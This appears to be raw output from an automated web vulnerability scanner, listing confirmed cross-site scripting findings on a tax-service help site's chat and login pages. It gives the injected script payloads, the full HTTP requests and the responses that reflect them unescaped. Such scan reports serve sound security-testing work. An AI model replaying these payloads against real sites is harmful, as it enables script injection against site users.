name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;"> <table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" > <tr> <td align="center">You must enable JavaScript in order to use Chat. Please enable your browser's JavaScript setting for this site and refresh this page.</td> </tr> </table> <table id="tbl_login" name="tbl_login" width="100%" cellspacing="1" cellpadding="1" border="0" style="visibility: hidden"> <tr> <td colspan="2" class="subtitle"> <table cellpadding="1" cellspacing="0" border="0"> <tr><td class="bar" colspan="2"><h2 class="subtitle" >&nbsp;Chat with a Support Agent</h2></td></tr> </table> </td> </tr> <tr> <td class="label" align="right" nowrap><label for="c_fname"><font color="red">*</font> First Name</label>:&nbsp;</td> <td><input id="c_fname" name="c_fname" type="text" size="20" maxlength="40" /></td> </tr> <tr> <td class="label" align="right" nowrap><label for="c_lname"><font color="red">*</font> Last Name</label>:&nbsp;</td> <td><input id="c_lname" name="c_lname" type="text" size="20" maxlength="40" /></td> </tr> <tr> <td class="label" align="right" nowrap><label for="c_email"><font color="red">*</font> Email Address</label>:&nbsp;</td> <td><input id="c_email" name="c_email" type="text" size="40" maxlength="80" ></td> </tr> <tr> <td class="labe..
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541
p_sid GET TyYLtJsk
p_accessibility GET alert(9)
p_redirect GET 3

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=%20netsparker(9)&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 20:43:23 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=71894 t=1304109803907041
RNT-Machine: 02
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 12186
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541&p_sid=gMVXzJsk&amp;p_accessibility= netsparker(9)&amp;p_redirect=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541&p_sid=gMVXzJsk&amp;p_accessibility= netsparker(9)&amp;p_redirect=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541&p_sid=gMVXzJsk&amp;p_accessibility= netsparker(9)&amp;p_redirect=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541&p_sid=gMVXzJsk&amp;p_accessibility= netsparker(9)&amp;p_redirect=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=OLTFree73541&p_sid=gMVXzJsk&amp;p_accessibility= netsparker(9)&amp;p_redirect=3"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td> <td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td> </tr> <tr> <td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td class="form"> <form name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;"> <table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" > <tr> <td align="center">You must enable JavaScript in order to use Chat. Please enable your browser's JavaScript setting for this site and refresh this page.</td> </tr> </table> <table id="tbl_login" name="tbl_login" width="100%" cellspacing="1" cellpadding="1" border="0" style="visibility: hidden"> <tr> <td colspan="2" class="subtitle"> <table cellpadding="1" cellspacing="0" border="0"> <tr><td class="bar" colspan="2"><h2 class="subtitle" >&nbsp;Chat with a Support Agent</h2></td></tr> </table> </td> </tr> <tr> <td class="label" align="right" nowrap><label for="c_fname"><font color="red">*</font> First Name</label>:&nbsp;</td> <td><input id="c_fname" name="c_fname" type="text" size="20" maxlength="40" /></td> </tr> <tr> <td class="label" align="right" nowrap><label for="c_lname"><font color="red">*</font> Last Name</label>:&nbsp;</td> <td><input id="c_lname" name="c_lname" type="text" size="20" maxlength="40" /></td> </tr> <tr> <td class="label" align="right" nowrap><label for="c_email"><font color="red">*</font> Email Address</label>:&nbsp;</td> <td><input id="c_email" name="c_email" type="text" size="40" maxlength="80" ></td> </tr> <tr> <td class="label" align="right" nowrap><label for="p_question"><font color="red">*</font> Question</label>:&nbsp;</td> <td><input id="p_question" name="p_question" type="text" maxlength="255"></td> </tr> <tr><td cl..
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET '"--></style></script><script>alert(0x00028B)</script>

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00028B)%3C%2Fscript%3E HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 20:43:31 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=79770 t=1304109811386830
RNT-Machine: 03
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 12224
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541&p_sid=3IOZzJsk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00028B)%5C/script%5E">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541&p_sid=3IOZzJsk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00028B)%5C/script%5E">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541&p_sid=3IOZzJsk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00028B)%5C/script%5E">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541&p_sid=3IOZzJsk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00028B)%5C/script%5E">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect='"--></style></script><script>netsparker(0x00028B)</script>"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=OLTFree73541&p_sid=3IOZzJsk&amp;p_accessibility=1&amp;p_redirect='"--></style></script><script>netsparker(0x00028B)</script>"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td> <td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td> </tr> <tr> <td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td class="form"> <form name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;"> <table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" > <tr> <td align="center">You must enable JavaScript in order to use Chat. Please enable your browser's JavaScript setting for this site and refresh this page.</td> </tr> </table> <table id="tbl_login" name="tbl_login" width="100%" cellspacing="1" cellpadding="1" border="0" style="visibility: hidden"> <tr> <td colspan="2" class="subtitle"> <table cellpadding="1" cellspacing="0" border="0"> <tr><td class="bar" colspan="2"><h2 class="subtitle" >&nbsp;Chat with a Support Agent</h2></td></tr> </table> </td> </tr> <tr> <td class="label" align="right" nowrap><label for="c_fname"><font color="red">*</font> First Name</label>:&nbsp;</td> <td><input id="c_fname" name="c_fname" type="text" size="20" maxlength="40" /></td> </tr> <tr> <td class="label" align="right" nowrap><label for="c_lname"><font color="red">*</font> Last Name</label>:&nbsp;</td> <td><input id="c_lname" name="c_lname" type="text" size="20" maxlength="40" /></td> </tr> <tr> <td class="label" align="right" nowrap><label for="c_email"><font color="red">*</font> Email Address</label>:&nbsp;</td> <td><input id="c_email" name="c_email" type="text" size="40" maxlength="80"..
- /cgi-bin/olt.cfg/php/enduser/acct_login_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_login_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login_submit.php

Parameters

Parameter Type Value
login_btn POST         Log In        
OLTSite POST OLTFree73541'"--></style></script><script>alert(0x0002D8)</script>
p_next_page POST myovr.php
p_passwd POST 3
p_sid POST TyYLtJsk
p_userid POST 3

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_login_submit.php HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 285
Accept-Encoding: gzip, deflate

login_btn=%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0Log+In%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0&OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0002D8)%3C%2Fscript%3E&p_next_page=myovr.php&p_passwd=3&p_sid=TyYLtJsk&p_userid=3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 20:44:04 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=433539 t=1304109844964563
RNT-Machine: 04
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2166
X-Cnection: close
Content-Type: text/html; charset=UTF-8


